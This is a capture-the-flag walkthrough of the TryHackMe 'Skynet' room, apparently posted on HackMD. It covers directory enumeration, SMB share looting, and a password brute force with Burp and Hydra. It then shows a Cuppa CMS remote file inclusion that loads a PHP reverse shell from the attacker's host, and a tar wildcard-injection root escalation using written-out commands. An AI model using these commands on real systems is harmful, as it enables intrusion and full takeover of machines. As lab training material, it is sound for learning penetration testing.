Skynet - HackMD

###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation` # Skynet :::info This room will cover The use OF GoBuster to enumerate directories and smbclient to find samba shares. ::: # Compromise the vulnerable machine The target is a webserver running on port 80. ![](https://i.imgur.com/BijnNIN.png) ## Enumerate the directories The first thing to do is to enumerate the directories using GoBuster : ``` gobuster dir -u 10.10.164.60 -w /usr/share/wordlists/dirb/common.txt ``` ![](https://i.imgur.com/g7PyFYu.png) The result shows a directory called `squirrelmail`. Let's investigate it. After browsing on the directory, we find a login form : ![](https://i.imgur.com/qUrsXa7.png) In the tasks, they let us know that one of the User called `Miles`. Assuming Miles is a user, let's try to discover his password. ## Discover Miles password Doing the **scan** with **nmap**, I discover that there is a **samba share** server running. Let's take a look at the different shares by typing `smbclient -L 10.10.164.60` : ![](https://i.imgur.com/NLZlThB.png) - I notice there is a user called Miles dyson with the username `milesdyson`. - There is a weird share called `anonymous`. Let's take a look at it by using the command : `smbclient //10.10.164.60/anonymous` ![](https://i.imgur.com/ZzLEmPh.png) We can see the presence of two files. Let's download them in our local machine by using this command : `smbget -R smb://10.10.164.60/anonymous` ![](https://i.imgur.com/FWqjPkp.png) Let's inspect the different files. ![](https://i.imgur.com/lqPXDoX.png) The `attention.txt` file shows a message of Miles Dyson. The message suggetes that Miles is an IT guy and maybe the admin. Having his password would be very great. The log1.txt file shows us a certain number of words that are like password. Let's use this file to test these passwords with **BurpSuite**. ### Testing the log1.txt with BuspSuite 1. I first intercept an attempt to login with BurpSuite ![](https://i.imgur.com/CMiPQlq.png) 2. I use the **intruder** module to try the different password. In intruder, i choose the position where i replace my payload stored in the `log1.txt`. As i want to know the password, i choose to replace the value of `secretkey` with the ones store in the `log1.txt`. I choose `milesdyson` as the user. ![](https://i.imgur.com/9z25Ixh.png) 3. I choose my file for the payload ![](https://i.imgur.com/2cRcNsf.png) 4. I run the attack ![](https://i.imgur.com/aLPY7Sd.png) The result of the attack lets us know that `cyborg007haloterminator` is the password for the user `milesdyson`. Let's use them to see if i can log into the mail server. ![](https://i.imgur.com/D8GX2cQ.png) :::success It works ! ::: ### Using Hydra instead of BurpSuite Instead of using BurpSuite we can also use **hydra**. ![](https://i.imgur.com/K6TvU4d.png) ### Investigate the web mail After taking a lot at the different emails, i find something interesting : ![](https://i.imgur.com/xDB8eME.png) indeed, it's Mile's Samba password :smiling_face_with_smiling_eyes_and_hand_covering_mouth:. His Samba share password is : `)s{A&2Z=F^n_E.B` :::success We can access to his shares. ::: ## Access to Miles Shares We access to Miles share by typing this command : `smbclient -U milesdyson //10.10.164.60/milesdyson` ![](https://i.imgur.com/bQbWwQO.png) After doing this, we can download all the content of his shares in our local machine : `smbget -U milesdyson -R smb://10.10.164.60/milesdyson` ![](https://i.imgur.com/rLivLbZ.png) We can see there are some notes left by Miles. After taking a look at it it sounds like he is implementing a new directory in his server. The name of the directory is : `/45kra24zxs28v3yd`. Let's take a look at it : :::success PINGO ! ::: ![](https://i.imgur.com/jTxjdH5.png) There is indeed a web page. Like this webpage is a "beta" one, it can contain some vulnerabilities. Let's use **Gobuster** again and enumerate the directories. ### Enumerate the hiden directory ![](https://i.imgur.com/dUQlReo.png) We can notice the presence of an interesting directory. Indeed it's the **administrator** one. ![](https://i.imgur.com/9rE9MK1.png) We have a login form running into **cuppa CMS** (Content Manager System. **Cuppa** is a project open source, that seeks offer a adaptable CMS to any project (news or exist developments, web, desktop or mobile project) that don't have a Content Manager System and need implement one without realize heavy migration processes, nor take hours learning new, complex structures and methodologies. I then try to see if there is some vulnerabilities associated to cuppa CMS and i found that there is a **Remote File Inclusion** . Remote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application. ![](https://i.imgur.com/VLIlpnN.png) ## Exploit the RFI 1. I download the exploit associated to the vulnerability ![](https://i.imgur.com/3rs1HHD.png) After reading the exploit code, i know how to do to have a reverse shell. By the way with the inclusion vulnerability, we can have the output of the server files like `/etc/passwd` ![](https://i.imgur.com/ofkty5X.png) 2. Create a reverse shell There is a good php reverse shell available on [github](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php). `wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php` ![](https://i.imgur.com/2qr0Sk1.png) 3. Make the shell available in a server ![](https://i.imgur.com/j8Hwi4A.png) 4. Create a handler `nc -lvnp 1234` ![](https://i.imgur.com/FkT2Rkw.png) 5. Trigger the reverse shell by exploiting the RFI Using this link in the browser : `10.10.164.60/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.21.26:4444/php-reverse-shell.php` :::success I have a reverse shell ::: ![](https://i.imgur.com/iBSBCPt.png) ## Privilege escalation I found a directory called **backups** and inside it I found a script called `backup.sh` owned by root. ![](https://i.imgur.com/RNx0lEk.png) It's a **bash** script and run the `tar` command inside the `/var/www/html` directory. ![](https://i.imgur.com/YJ6oNfo.png) I also look at the /etc/crontab directory and discovered the script is running every minute. ![](https://i.imgur.com/xpAZiR4.png) ### Escalate my privilege with tar After doing a lot of research on internet I discovered a technique used to escalate my privileges called **Wildcard Injection**. The **wildcard** is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken. Some Wildcards character: - "*" An asterisk matches any number of character in a filename, including none. - "?"" The question mark matches any single character. - ... More details [here](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/) Like the tar command is execcuted every minute by the root and because of the `asterix` at the end of the command in the script we can elevate our privileges like shown in the following figure: ![](https://i.imgur.com/byz50D5.png) 1. I go to the /var/www/html file 2. I execute the following commands : ``` printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 ``` The first one allows to add the SUID bit to **/bin/bash** which can permit us to become root with the `bash -p` command. The second one allows to execute the file `shell.sh` There is a `–checkpoint-action` option, that will specify the program which will be executed when the checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence Options `–checkpoint=1` and `–checkpoint-action=exec=sh shell.sh` are handed to the `tar` program as command-line options. We can see that with the last `ls -al /bin/bash` command, the SUID bit is set. Then just a `/bin/bash -p` makes us **root**. :::success I ELEVATE MY PRIVILEGES AS ROOT :::